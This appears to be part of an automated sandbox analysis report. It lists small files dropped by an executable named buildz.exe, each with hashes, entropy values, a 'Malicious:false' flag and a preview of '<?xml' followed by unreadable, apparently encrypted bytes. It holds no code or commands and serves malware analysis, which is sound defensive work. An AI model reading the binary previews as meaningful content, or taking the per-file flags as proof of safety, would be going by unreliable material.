                        SHA-256:52FDDC5CB365DF15C5CF3A03C95EAE4F1C849BF345DE0AA0E28B93B8FD00ED33
                        SHA-512:653D49A217D1EA3C7931D75710B922513979481A8B931D202387B3733D1502D7CDFA169F2C7F31D36E2D4DADFECBF1195055A0FC4FB34AB1F70C2C7353083568
                        Malicious:false
                        Preview:<?xml|j.XN. )...h..AY|..sw.........K%x..>....K:..wt..../......q.6.........#[.z...8..<.....6.:..1...."..Ot...4.g.8......w.....^.t.DhS/.+.....h..6....p..1[mS......b.......0..).&..C....y....C..Lc.......}.X'.z._p.....A.]..G.`2.............zj.@r.....<w....0-L...L......z......V..._Q...5W.!%...sC..r.P......oJ.........`zU..h1pM..p...&).m-s...X..<...5........W^g.<.....~C%..`.....9..3U6.D._j..h.J...[c]C: 9'..v..V.....A.....<W.....21......{.....".s.9s....J..e&4....s.Q5.*..xKt.s`T.......9..^./....Q4..|....X......].sPR.`....\.n..d.....h[^(.........9$L3...(.M....H&K.........E5...3...l...&.zPG....../.v.p...t".e.hMu3..&........z^....{.g.&...P...V....?.<.@.jt.....L......4.J..A?...`.\gZo..T...@AE@....N.)..Le..Ti..X1...V.q..7=...*...b..^..(@..'.l.B%.f....PV..K.7....H.v..6.r..j.c.....G...ID_..4..L9.:x..S...j7.f...,.`n.'...#I.l....&.!......H.W%...........9J...zakQ..U.......d.,..&..&'...6..w.....r......Y.q.i+..M76..f...#... .65..d.4..._d....<..#..3l..U.`J..W$.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1689
                        Entropy (8bit):7.874048937789706
                        Encrypted:false
                        SSDEEP:48:U3LXIfsLGGLhfmyLu/G+ljBEU5J940TKnrpaq282vOUUD:OTtLGAhNL+9BEO40KrpB2UUA
                        MD5:8EB8595731475CC7CF5FED1F8DB8F877
                        SHA1:5B4B76A52AA2A2913C0AB1BD2F4C53C611E6D426
                        SHA-256:A55FA4E5DA73A8ED8A10C58B2BCDA34D6C41EECB1F187684B4CB6ACB96E7E18B
                        SHA-512:4C849C5C1031B7FF1F8F491A78B9758A1AAF71B9FDE4C669A3CF60D05C3DBC5729D33C369291D82E3A6D1520358885870D922C9E158D10542BAEB5CE232CB50A
                        Malicious:false
                        Preview:<?xmlV.&4..m...xFd.W....:....bM...s....i[k...0N.......a..S.E=.4R..6mF|....`,).7i.d.5.h.}{gV.W.R.@../..4.{.P.W`J...w.[.*"C..2q.R..y.*s."y.R.3j..u7...4OM..=.C]'........g.........4.....D..Z....K.sL.-g.ZR6I"....5.T.C.kFl...."..a=.n.M.eB..7W..W...:.3N.h.&<.../0...zC..~..T....cJx.Ng..=.ChP....+..!...0...O6....8.p...d.N....3 d.....rZ.(......%...\......"h.d#J.1@..Lox:...!.t`...-Z.."j.}.p..F.D...8$*..9......-g.C.0...h.7....L..+.f.........d..~.0..&..'.L......V).W.&...JZ..Ef28..w2(.R.X...m...`.ZUR...9.w._a......n.AI.....A..6.{q..V.C,r&..m...3....q...T...;m.KrG.8m...n.....y..f...;.....r..L..f0p..9WZ2.*.N..J.....W.1..".......]J_..=....,-.g.....m|.<..M[.)2....T.......sN...!.....]G..z.7K8..F|.ec(3...!/....!mu...2t.PQ.g...6....@..Q.....(.>O.$..&X.K....R..5.n.=.+Q...B...obJ.!p..L..F.&0.x...Q..s.}@xpN...L..o.. FS.eV...l..".(..M6.......'bZ.w..G..|..,...0Y..A^.U..#...,H g....'...J%...f&%5..5L..]2F!..:kA..@...m...=j.y..n6...D...J..z..2.......Ix.d=y...G...*'8..|.K..o...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1726
                        Entropy (8bit):7.871301322868391
                        Encrypted:false
                        SSDEEP:48:i1UR30xuuyUJrdtYxzH6T496fY7urg47GsaUD:iyZuuuyUNYt6T49r7uraA
                        MD5:4E6E19E3099D94C8D01A95A8BF68AE2C
                        SHA1:DE4D40E52C9CA7EDBD880E65EDC56531E16D09C5
                        SHA-256:20310D47B9296185B5826FA78A406DE0C41935A2918889DE9E07CA12FD475FBC
                        SHA-512:EFC2E5A0173716E5F21CD864780C43745925DAF317F3072C259B8F4CBEA61E1B01CC4B056138550194CE8FFC4EB09761104963BF065F10F60AEC713BDE12996C
                        Malicious:false
                        Preview:<?xml.b~..=...SO.o.0.....sC...n..p..R...>K...ellO.ekE.[0.#...a?.b..gF.-....e.h.X#..P.sC.6...'=..`.29+o..a~....d.*.....bc....../..dG.L.\.l..<.qs..._q.G..VYQ.....!6.}=..*.Ms... S.......R.....G. j.,L..)`.....O1....).z.=.7...VR.a.D.......x.5..V........,e...\.:.~.3..)z..-y'...b.L.eG.>1.c...+?.<t>.JN..)....`..%..;b<G..,;.o/........m...vn1.h.......2...........,...U.{.....2.......=.....P...s....rE.sS...Y.(..L:..\..6".lhx.<..q.].f..I.).}nU/(.S....3?y|.$...}r..a..32.:g.r./K..iw....G..Cu....1qb.d..C.J.......L.V...j.A....\.....5B........-*=..l8.iY....^.=".g...E...0.....<.!p.....A...E....@....YtwS6..G.F.y#.4`..A......A.6..A...(...*..-x.=.^.j[.l....~k....3X#`.`@.z.0%....Y.....}..-F.b&...........e...G..*.+=.....n...uj".h..08.IM.......e>.L.......). [....b.+I.x`.F..S?.(M(X$..E1..P.....a...8.....Qw..|...^....h....`...].. ..Gk...,.;.0..b...s.g8..z.i..h..BI.79.q=...0..>...n......X..#U;E.........;oa.NO..z...p....X~y.8.......<...h...a.@..3n......xL.@."
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1707
                        Entropy (8bit):7.870923774589989
                        Encrypted:false
                        SSDEEP:48:u7i1CRHiKTCj/vCHPsghfI5Rp7kJXEtkHUD:u7dCKWj/vCv4Z44kHA
                        MD5:AAAFEAF67A671C9312C6079DB7C092E0
                        SHA1:4E020A83915F955BC0617BCEDAE814A17E730C67
                        SHA-256:F140B0514FB2C7E511F2C5D719908B74E3F3038561FD1733A58FFA33861BCBE7
                        SHA-512:850FF7E2843B256226B3FD28FCEABCE8ADBF3EADFFB9EFBFEADCA4B13570E12847C3AEB69894A2C88D4F2AAB0DB42A7E1A79F868D273CAA4C65A438E0BEDBA7A
                        Malicious:false
                        Preview:<?xml..A.>..z.~..W;.'..?..-.$7.....|......)Ll&...G.....f....c}..c!.#}_[...5..+W....TV..Dr.Z.7D$yy..0..jW...G......I...&...Q...M "..z.n.P.....k[..K0Z.P.R. Y.^. E..s...<.C..>.TT....xpKa.E.|.Jp..D.7...6X55..........7N.hQ..YN..O..'.i.J?.......vT....W1)xx....zS"...=....m...X..V5.>.......5.M...&.......&...lt.=.Sb..A....x.Q#..F.3....-...77.....).H..!e.=..(.f........\..Z.3.....@x....."..M.._C......0....Z.Va+!....ni3...:K.....\Ib..../..!..VU.p..".....-.}i..!...0...68..d..EM.K..a<.(......Q.`Fd8.}H...S.]......4pfn..y.^...{....Y@...Kqd.h.*./....e\_I...w.\....:..Hu$wK.&h...+i.`Ql.(........M.8.r....g..N...6...p[.d1.lT<7..7Gyq.v..G.s+.H......U.....A....-aH. ....y.Cz@....Y".7....V..4..Y@.Y...L.b.ji;D9.U" ..zj.}^x..)c..@s.%F..+B.zQ85........*pn2+&m..r.bE.......Z?....|.X].....M....A./{.....6..U}.d...L.OF..E..Pr"..v.#..3W.d......."B*"+Pp/.".-.o......d...J.`.Ol...U.;S}.(.r2....9...._.....).8...U...u.di.#...!.q.N4.a.0.M.).8J...P...1JS...=......'........4c.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1744
                        Entropy (8bit):7.884536218144881
                        Encrypted:false
                        SSDEEP:48:i48tUJEInB6rqoXUkcKIMsmjBnGvIlec0xEUD:LajInThMsm9n25c2EA
                        MD5:2453F0F9433E2199FE001636F1E6D927
                        SHA1:D48BC81011065FC15C1687BE4737512B78617C86
                        SHA-256:E70FDC6CD3B637A22BD2F77C9B1361361496A9DB4DC31CFE8BDEA8F6B670F160
                        SHA-512:38F8C32069CD92CA3D5E2A628582E80833ED7213693002BC07B6FB125F0078A886FAC50E487CF8B9F6FDE535E69676FC91C7188FEE41D66A1E296B96BE15FD84
                        Malicious:false
                        Preview:<?xmld..&.&4L...7N...M9..&4.h.-.o?8TO,./0K...!.U.w^... .g,H(.R.?..1.4f.=.x......8.(.L%.2N. .;..ze].......s.=...q|..p.:@.9.\2..r.f.G....5..E.z.(.&..W+.....kP.4....4...(p.A.t..n.q;'........@.I.Zn.....k..8.7O.G.A..SO...>9....!.....V.!.q......^f=.n.Y..D-.Q.B...^X.....kEP.._...W..V.xt..nv.i..ye.......>...f.......V...'F..R...~,.....5.u...9|..........yW.rS.r1..Tz..fs.f.t....>+%>.....~.(`..H~.9..b>.vS.H..p...7gGE].P.._.......ZT.,1....}..N.z`e..+M7.<.)_...Q.i.'..".Lk../.5..........fe....^..M..h.E........].....K.7...3/6).8....M%....h^.....*............vi....7..^..#..a\.O..i...J.9v...C8:..s.~....^4N.,q..{..6O..A^.......K...&..,t`...3`......q....Y.C.....p|.T~.....n........y.../.0.AMz.U..J..|i...........V.0..G..)!.X.....A....t.......O..Fc..Fu.g.*a.<..r.....9.B...[b..5....<0...J...yh..v.....)....vJJl..{.q...26Hg..hJM....|7HZ...Y..'2.8.D.....Tp.U Cf.......D...C~Q....oy....'......9..@.V.5xZ...y..M.\.'Kyy>.K.1.......`...(.ed..(....I1o.I.D....Tq0..4...b
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1695
                        Entropy (8bit):7.88200121188952
                        Encrypted:false
                        SSDEEP:48:W2LCnAg7mqQLk0wBPCMj5+FxZupf1yAJAuUD:WLXaTLkflR+fZueuA
                        MD5:83BEF6ACA44CFBC5F29736C441298EF5
                        SHA1:F07C4B7AB0B2B3679FCD2A8AFD878AEC74A5CECB
                        SHA-256:010E37D7C0C9569982A9942B333CE3140566B23039251056903D4508CCCD1E2C
                        SHA-512:3366B8E45EF2381231A3B686B9411B6E4ECA2721F1C779C9011EE24FA5B2A78072C3E65E6142CC64A9BD4E769EF8848B754CC518C8B2BE285AB9E11A1EE09920
                        Malicious:false
                        Preview:<?xml...8x......X....F.@.m.9...V..-Y..&.a...p.p.o.v...kfqC.7n.o...t..G......h.+a..m..#..Z*.|....._.kf..ON.m..f...%6IMK)...~.4I..H..........sJ}t%_T#.2...`.".....B....=.>..l.....pv....Qe...S...-.....TP..W..0y.n.K.`."....Q.`t....Z...H.. n.....>)Z..j7m...-4,.{.p.~.+.{..E>.Z......#.N_....n.^Vv.2j.L.NUv#.F.6....#x.....;u...".IK....dw.$.gee.I...C7..]......2N,.....v....F....G.M.{k.i.6..i..\......u.+...a.J.p.$.Qf......EIS./.......e.;pR.g.6..i.......m.{......ah...3-yF.|qp.............I..+k#...cg0._............#.......n..g..N....3..+y.vj..2*c.....#?.ez.&.So.m..h........U.B..S.O..G%.i;.'..bjF..E....N.5c....W..[.M.c..#.P....p\X.M].........6.5).=.u ..ys...c...P.q...,..0.....K+..=.1.wEw.....Q.>.i]#>kE...:.}X.Z.W..h.*..ips......].I>E.........E..N...m..'.B.4.O~.}u...Gt.u..5.Y..chQ...E...^.o......4MX\..v]=...w.....j..._..hO{....$.{*tPtH..d.5F.,...[..=.v......(j........f:.]HB.xg..r.....A.[h..w....3.....e.."....m......\..W&.fM...8g.e...^&y?....k...6~..9.Z....G..h..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1732
                        Entropy (8bit):7.871999315132998
                        Encrypted:false
                        SSDEEP:48:xPdXStbp/G+FMheiyOpCAyOxwF1lyCkEGqGsHQQ9OUD:VdC6BLRk1yCWsHQQQA
                        MD5:5DAE8BB076F286C0B062E287F12D37E4
                        SHA1:58D308C843B947BA4A87E5542D324619E6770F78
                        SHA-256:02AE1250806FA688EC65A7BA3617D8A4B7FD0A3DEE5AC48282A1B5695CC73B78
                        SHA-512:FBE7BFD9E0FA0C692CB8426E637482F67D8C5FE2C7965700787C8AD63A53CD76F27FC6890630DBBA0DACFA4FC468731302A22CBC95F3FA28CFB1A0949892D316
                        Malicious:false
                        Preview:<?xmlPHl..p..j..;........*.z_K.w.J.V.s.?...l|...yB.......gI.!.?%.....t.B.......m...(j._O,...G.N.o.H.dlR.......mU..:..0..`.....S....f\.M..R.!.6........!.......1..G,...f!?._...q..h{[.W...;...3..A56...x....{.1grNC?...`?...oi..i=v.. .-2....w-.."...L.F3..^....i.-tz8...E..}.....I.l.U.d..j$.hd..]......"....,.d.u..iKF.A.vn._...)-0..j%.;O.SBv.gKZ.|/.R...&.DX.^.v\.....9.....n.l.`..E.f..y.E..X2../...)...8..Hh.$.u..&.X....E.O..+.IG:kN.B>....<.#.wa.y.Qa..qj.l.0......u.O...2..~..-.D.<>T...f.#A..[.......=..zi....o..*0.a.-RG..Z#T..!C..R.F..........2.=yMDi.....>.c.U.O.0....h_\......M...$.U.CS..pO....:.....C..-Y.Y.?.Mq.1....20.j..x7...+_..D:.Hq..NV..S....5.Lx.....GlE......yu<.X'..U.}d|....`k...u.E..=...R.'...>...P..l[........!.i.?+P..{.D...c.d..{....d..i.I.>.Xs.srv....=!.O..J........L.\..Y|...6n<..0...[.'..4..3....7pDS.."0.<.JK..C4A..o.5z.#...%...N.{:....J.Z.O...!7SZB......Aln.I...|.I..q.e.&.Vk.0.9..lWx..N.n...V....f.T./..}....../0.....8.,.4.A..2c...`
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1693
                        Entropy (8bit):7.869226366645115
                        Encrypted:false
                        SSDEEP:24:v2HexyT2+WINbnEQ8qL1JGniOOL2O9b4enLgmTKijGnlJpbgCxE4WDgDaGKh/+Ii:+qMFNEQ8yGW2gLgm+iql5xuphVvUD
                        MD5:75DE7107FB3C4A6894D42A541B99955D
                        SHA1:F951A108797776E8C46B82EC04271D2930A4E9B5
                        SHA-256:E0F86DE73547CE4BF3D81B4F26772AE88F3D369A23A89770930C83957C76A95E
                        SHA-512:D00BD5A06B88B57E3BC8E25EFA0E21CEF4083D193FCACAD04B4619702F314229CDC8BCD3226E663C25DECDD84591C45CB4C7D1B5258EC26B044DFCCFEF129A91
                        Malicious:false
                        Preview:<?xml|$.P.....<Y.a...D.(....oY..IZ.c..Xm...L\(k....g.].l../9~..d.1..`.....3..~.,..;...a(...[^.|....1gS...q\-....._._...2.Ms.....*.n...u.0x.tvE.l.Qi=CV.....\T.M.[...M"...S..g".......1...K...#.Q.0.&.*z........9 .......\.m.Y.q9']-.@..z..;w]'^p.T.............!.9._a.gv..:.G1F.+].[../sX..<3..B.<x.}.W..E!.P.........x...m...i....#6.f..O1..D........#b.p'..........*\cm..z.,....l.C?..A..+...'....=3...Z.m...zp..[L.vvP<.0.....1.{p...P.*+..Y.g..M....6..'.:..a$!y...-z]..p/3........l..:.x.C{.......-.m,.Z?..?.G....E.M..h..P.0~...q.<?.>..0....C..}...T{P..9i...l....V)I....7..e...b....R.Vz.;:.+..o.Qj.2........1.ge.|Cm.i..fA.p.V..P.7.....ym.f.2Q..W.5d..-....8.Y..o..*....c=..&..*.e.d?)=%.3.";....'.wt.;x.x...K,............h..'F.a8..|..^..z.A..X...........5.UB.N..1($..o.]..#...yD.$%..g...(\.h.{..c.v....df3....p....^......|..(Lf-..xP..GU_.(....!..e...E.Q.@..wh...Y..Y.s.........G.2....!..3..0o.....$~..PIx..%....1..8....lv.....x?q..N.`....6...G.3.~.;.xX.L../X.Y
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1730
                        Entropy (8bit):7.877652416090214
                        Encrypted:false
                        SSDEEP:48:UXltcAblrfEuIC/xjuCThGpscK8c1StZpfiJUD:UvBfEGjbTNkZxiJA
                        MD5:1A6DFBEEE3C98237DDB304AC5275E4E8
                        SHA1:246ECA2FA43360793A83BB3B49FF8DE6D75E5B69
                        SHA-256:A9F0176252F1D4BDC71BD5B67DB508A408F14E07FB1229A75B4EBC294EC235EA
                        SHA-512:A6428D728A2FBBACD3F67A79A16F7ADDE0DF05B850A2858973F0CE44018247718A77591AE22447CE5E46CE20FFE300A8A741E5E2F77EDA284ECC9A71C1BD2632
                        Malicious:false
                        Preview:<?xml...EWq.Otu.L.2..r.........Z.k.Y....V..v`..-.....I...Rz.*....C.$.HQDs.......XI...y..%\D..&.............-Q.t;.....).1..%#....3.?mB.M.6.....l.9$0s..........5<..e...[...).<&@...q.2..f.K.0^%7.]'...\Td.8.-....0..I......x..:..mT...&.......&;g...ki...LI.i.8.m..2... ..G.S5@].\r_(..'...OFhK...+.rc.....C....EaX.....<.._l..!W.. .......1.iY..Y...Qy...'hH.....}E.....b...o....=...$.ac...%..w.}'.m.4..iH....z.r.@.}y.q....fA.mcl.r.....e...`E.X6..m.]...-.....k(^AO.+.D.&..7.._.v..T..K...i.Oxy.p.:P.{.3p}.D!B0.[.7(.6.O.of..)..U.@...W?....-.!..4.. ..@.!.^..#....+c.m.K8:..S5...S5......rc.._..f..f.+.*'b...$...~....S.h.TZ.h.......7.0%.Y..C...'..U.m.....a_.PYy.....k.>..... <..m./S%..[s.#.E.e..Eq....^...d.W....u..n6..T.8....RcGS.A.J.....).$..cX.....Uw.c.RO`.....R.y.OSv...K.E...cJ%`...Gt.>.(.u?...#...!.8B...A..l.6.:...,. ....gp.A...k......@.........a&..~.j..Cz.U;v..R.k.H.... ......&...\...HN.`E.u.1..tN........v..."g3.5.r......F... UQ...Q1Yy....h...jxIt.O..E..Y&^.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1715
                        Entropy (8bit):7.891230382469282
                        Encrypted:false
                        SSDEEP:48:noTo6LAEAI1moBVMG+A/IR7lckwru5xUD:GkEx19WR7srCA
                        MD5:9ED1CB58DE9E1C1304CBF9D92590FD55
                        SHA1:445E901D4AB379A6BFDF8289B0E145DE70AE0217
                        SHA-256:15786462FFC59F0F0B2172E7280EE01F17D704663A9E7582F4675B57C2F4B9F4
                        SHA-512:CB535882A46A976485ACDCAADFCDF21628A715B9CB207235F0F5EC7CF3352A94A023F12BB996E37E3AA52B6D752A8BBA0C71C6DFA4F0430C96C1E7F6E5790A03
                        Malicious:false
                        Preview:<?xml.........~.0.i%..4....->.{e]].....x....:....JozjV]...?.....{...j.2..XG#.g.-....]s(.\!..x....L..[.I........1F*`.....v..oKO..P.@@<r.....a5]1d....S..@...)...VK..`.wZ..aw.v.e&.~....4.XfU~Q.Y*/z.+...%...1m7...R2W<......./HeH.*i...b.c.}B|.b...n.yf.P....l..._..`...s*...4[.A..WI...}...x>>.*8.....[r..T.H..p.(Y../..[.x.j.W.'.E........g..a..nY.?.F..^.M...]...k$..3:..(GK.q....U......j...<.5,......b\.v...I..y.5.)N...x.Px.E....l.........{.wC..Z....+)lj..~...<........G.....>W.8..YB.VF{w.ly9.j...$G..J...4s_....L5........rO...T..k.d..m.;.].3 Z.7.Ps`.)...K.G..=_..S...a..K...U...G..0wH..,.......?..Ot.9...kWk..s.7n!_mV.2.e..)..%o..7..B.O.?N.qj...zl...A.H$n.....P7. P:..D<..Ka&...u.........V._.........F..d..a.....V.....@.X.p.wNqv..V..`./.......E.>=cs.y.c...8M...p......#....!.. ..?_...p...*.g....@C....l..W..3...E..+W..l...SJh'Q+..].p^>c.0U.V.*L....;$...H..'a0)..b...>..1.C..'.*.U...sa....Has@"..poB......L...>.......I..5Hu...7/.t,.=.'#..T'hOnp..p.T$y
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1752
                        Entropy (8bit):7.883692655258993
                        Encrypted:false
                        SSDEEP:24:cjWruB3SeqO1vdIEfwNX3pkhGZbenRrPPVV68+6RmsbRu+H609MyS4/Az4xMGbD:7CB3SeqWW2o1crS8xlu+Z/ScnMUD
                        MD5:5DC0C9BF844A46CC3349211583D7B599
                        SHA1:4280B899EC89B5B146D592B71F362B693AAD4FE4
                        SHA-256:A5590EA87F2C696421DF6497473F7F25857FC632F1A7950875F4780E45D01FE4
                        SHA-512:2EEC51F4FCEB44FB3C76C2825916C533C3B60704262C0F5EFC6E882F2A13C13419FD02460BFF157CA2AD0226A5DC7BB68351F215FBA8304FC021AEE6CF511216
                        Malicious:false
                        Preview:<?xml<..(.=.U.t+.../...$.C?.[..*.;..!I....S..)...U..\.O...+.\.-.N..t<$.j-'.8.6../U..K...c..M."7*.\(...$r.&.6(.T..,...5....0|....'UVT...N..- .,x9a..+_n.'.B..N|.._c....!x...;.Uq.G+.e...>..M..#.i.$8.s..B=M.6........o0 2....s.X...../nZ.{.UU|..N......VP~.b..}^w[..Kh..t....Su..Pom.P.......3...s.Ib...z.m[.9u7....<..!.. ...-...S.`..Av/.).."..`..M.0.P;. .z6..g6V..1;..?.....o.e+i.1.r..j.....g.z..pA.{...U^..i..Y...8..n............w.=....-RQ...gNE..C..d.@.2...R.T..Rx...:...s.?.....F[vv..#.&"....%.W..l..3.]..NVr.z.z.z.1.k...3.....U...~"..e{d..Q..."..x......%..=b.B.|G..Q...Z ...6....mk...M.cX..w..H.kh.V.......2..\,.....s...$i.7I...}8....9e.E../.f4...........7.........3&U;..:.U..X_..$..9....5.\.Rq.pg$...sF..Z.d.....z.P(.../i..#a...*T\..S..*..d.r.+?...Y.-....-{e...T...f5.5..Qp#..a j...H.X2....x.Z..D..?............`-`...:..l.`A...... .4.b...m .^.............e.......8R...\..R..m.p.......~...]....r:.?..1.;....C..I.&...7...aI.<1.D.y.G.D.[.0.8~.t.4..?/.T..i.v...C.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1699
                        Entropy (8bit):7.879417439850743
                        Encrypted:false
                        SSDEEP:48:twtXlW2AGH4ub3snetj4jMExDgtJF+VA+ZySUHUD:+XlAGHn3cep4jMUqF9pHA
                        MD5:6A27154438E143E2186BAACFA0FE88BD
                        SHA1:804A795D688BEA0E9A120C78F50FA84A3E092449
                        SHA-256:963A2A38CF91C5A8474EFA03FC2AE7B50198FBC5DC36F5DCBD7242F4629E74E4
                        SHA-512:002937DD821F109A630611AC12B39DF8717931B397345E802FD656AD454815D08B883C242FB719855E13C3D0BF6732E0C569269CAE4C037C1A0B0A58937A30DA
                        Malicious:false
                        Preview:<?xmlo..i..G...J.97...O..A.&/sC.a'.).....<..x4/-E......p...."&..bP.]W.6....:........L@.....oH:.....t.x{....T...I.!.6.6g.cb.6.<.......]..`.v]......T....../.............v....DC.#U....-..f..Z..p.......~;KX.9MwA...f...L@..[..c.m......hs..%P30......[4..n.....-zI..J..........F........f..;y..._T.....g.....(..K........^M..#.2....A.}Q....Ci..0........N...gK..6]..<..rI.4..Ks.J0v"....K..PQ.......TC....?A....7.|.W...gXz$2#x;.B8.......H2:"..c.R............3........I...Zj..s..._.k.....EpV..B.7..h.yIq...vo~.7x.a=.W..}-.I.F ...^....^......g.c$....j2...:.....q.....M....V..Y.6.. ..B_..".).^/...G|.0.....H....]....pxy0...Kd.Ur..?.2..x....=z2..g..j.(}%yO).."..J.....!j.^....n......ols..G..D5.v...........o..E..l$.....kO7p..^..g.#....8.Gu8.c.H.7(.4...q..[..v!..lwK.....8..c..8....z...W....=.*_.:6.)......|o..e.........2:..bY..W&.F.x....|..~..xA.0...W.h.......5...0.9`8.c.<.\...7Z..........1.n#.F..S 3.u..q.H+M.......4.&2.7..v...n.....#.m..F.q....\I.!.5.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1736
                        Entropy (8bit):7.873145973729683
                        Encrypted:false
                        SSDEEP:48:+3Dqf4Im0rHMhOYaHQPGPlOX4nTAqRZPbzbb8UD:+WQImPOHQPG8onFvb8A
                        MD5:BBA526E337E9C7C9405057FE6B44B275
                        SHA1:0BED79F7330DEF994CB868624542FE03EFC2798F
                        SHA-256:884CCD69E8DE33FFDFA2B9616B31F614328AD7E049B5A26E4D14CE50BBD4D6DD
                        SHA-512:D34F2763600D4939FCCD6CABB49F309973A10877A078F8C910EB0C81AC85D5877D9F97E4FCC54FC4A078A984FE4B03BCC2DCF7A0C2AF530864CE96161EA094DB
                        Malicious:false
                        Preview:<?xml..x]..m..#...B......b.p....I....K.59d8..4.9.......,+..9..d..6.M.0...K4.BT.......A.J..%.&.u..v.a...>..,.?.j.".v..#/.).t.......y...E.G(.x..K.I.j(.Y3..@.4....Z.5....A..!.2f..Oy}f.*7>I.G.F8.V..r.$./3)|.G..@.IM.M...?W......t7:....}....>.8..H......}.....=.i}Y*.....K...5.[w.l.B&..]...=XF.....s.6'Q_T....F..PU...,.j..<f....7..u5....{;.T.....t.....T.w..P.&....l...Nl.[.s.sz.*~).'%.JL.U"..E..u....;...m$N>P...|X..;.t.LJ.U...x-.`\.>uI..E...8vz.X|......jz..N*.N^....-K9.i.1\. ..._.......j.......h...I..2...f.....*...`f......f..s.........E...B...?......2.....(..f.....O..o...3..:....y.{...9.I....Cb.=.t {.Nr.di..A..xLjY....Z."o.....x.....4..9.(u..-...(.,.?....#.....1....1.t.i.i _..P..QU.m,=....0.F...~'%..h...A....56.*;R1i.oF.Pz....12O.\..d.x.-..?=|<X./.....Wx...N...}.B........y.....y{.Tn.#..)...W_.w'....o.'.5y.....A.\z.]9..|...D..+....,.....;.F]..Qyw......WC;z......R.B.R.....w8rf.@..#...@i....#.I.~.$..q..J...A.P_.D...>.Is..8....bJ..[.QBy.2.k..=.<..}...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1721
                        Entropy (8bit):7.878575540339867
                        Encrypted:false
                        SSDEEP:48:LpKt1gOHAR/eMPg7QgZbagxtgeGl+DSVeXmBUD:LQBgR/s7Zt/jGlxeSA
                        MD5:E034A0910D830BAC79C4E26F600AD834
                        SHA1:2A5B035E95EE026F43FAFAB86D3B4E492E68E873
                        SHA-256:10547E3BCE517159E1455DE255CA392BE29A5D5FA6EA473F7C84873EB6A7F1C6
                        SHA-512:BA4C7E64E9BEE19A086780D0FBF8AC0413F0B31BBD6039E6BBEF18DC657CE77245CED2A454C201F340597F603615DB4E1275C38C2B982ED57E4FFDFBD2F67115
                        Malicious:false
                        Preview:<?xml;_b..\4.g.5}.j..'...)wX....o..S....D~....x,.E\.n.+..w.vG.K..U-5".E.Ly...u..+..y#..K..S.......\i.tp.($._...p....!.l..+.%....Z.oP.J......P.cH)....b8p.Z..x...G.ZZ..?O>.s......Co..S...+h.vv.VQ0)h...{{'....Rk.p@...`y$....}..7........n.....v".o...v...Y..`l.....|...&../...:V&=a..Y.|Do...,=.....!...!..s..H#).]NLK-.*w....u...I.f.....l.#........}..4.Oy.[S=.....a...P...k~..q(.)p....mw.]?N.Sr<x..+...b....y.2)..:{._.`.......$...}?.....(...T....h..%3.r.Jd...!k:..r.tg.\#._k.$J~.1.`...b^p7.4.......}.r@.].,kj..^.k...$.....j8...\.vz.pm...#1.].....+.......k.ye......sw.. ..7. .]...o.D+.GK.5.....Aq..3.!E.~.?...>.Phr.....z30..b@q.e.owC...A4.s...6...AG..7X.s...G......,3g.B..S..h%....D...Y.....o....Pfv.ykm..w.TE..s.0.[..'.....y....:.:^.k... 5..?.lZ/d<.).k....!.........t.rPg....D?...Jj..\....A5X~%.....NW1.cF3...Z..L.........+..=.kVI.Fl.v?0?N......IQ...^..C1.;gg.6...2I.6[K.......u..W.+^e...&.j..'...3*r...m.....)3.+..nj..S.t..XiL.....W.^......{_...G...(.L:.V0
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1758
                        Entropy (8bit):7.883519025246529
                        Encrypted:false
                        SSDEEP:48:5AZYdzawBpvNAGCryWYfHaUfEZJZTkOALvUD:JgivirAvvfEZT9YA
                        MD5:2525D03142DAF0AE0EF360D2FDD2C9A1
                        SHA1:50B4F79DFCCA5E678C176ACA03BD45F5202B608C
                        SHA-256:A6636DD1E84BB4407395BFED612A3E10495CFB294A7323AC9413D22FD4E5AEE6
                        SHA-512:2BE6C471B846C5E110638A6ADA33A107842267920D43F8D9F38F9AB06DBFBA39C777F44F42636C03AD844002F3EDC2D44F3C6E76D24224F983CDD98C23E1721E
                        Malicious:false
                        Preview:<?xml.."..z....2N].. ph.['8sjb.m`..k1.d{Y]..'FZ.........X.. os..k...nm$..5..DY....=......y..W....7...g7.'.L..]UD..z..\....U>...cE......Cf.A..D.E..8.....C....p\*.@_..gj.8..z.."{>C+...FD.V.HHi...9>.S....Y.R...y...z..[}#nrB.;UE...F;..j.C....#.*}......8g..*..{..:.*..^....F....../V(P....q...$<rr.VG..I.U..AX...a.H....s..%.eWn$I7>..&+...R..[.....h.."...QXz..9bqsL.\Ok.._i.=..n..R...968X.I."y...=.Uf...MP......_....0..jc.oV...._tD.~..LY;..@'..|.l......7.2.....%'w6Z..V..8...V..cz...)..Z.BP.X..Y..M3VnO$.V,...etU. f.z...&../..t../.^b."...z..O.D..H.......&.I0O.T.l.x........8...i`.I...b.-.V..F....sr.zf.:.{p.X...F&....!..BV.}..p.p.)......-.J.@]w.b...l..W...C.# .%..S.!Q..*w.b...9e.;..azT}..Q0...... .R....o.%.$]./...<Q5.4..y..`6..1...N.<%.ET-.S.........._...-O.L.[...}..[....~.....l)r[b.{.T....)...@....192..YcL..........B"2.....q...Q.^x.}#.z.:........Ii....&..3....{..F.....L.|.(.P..2.......8.T..jo"..8...[.\..2.o..QV_......=x...._..?.e4..%v[....x
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
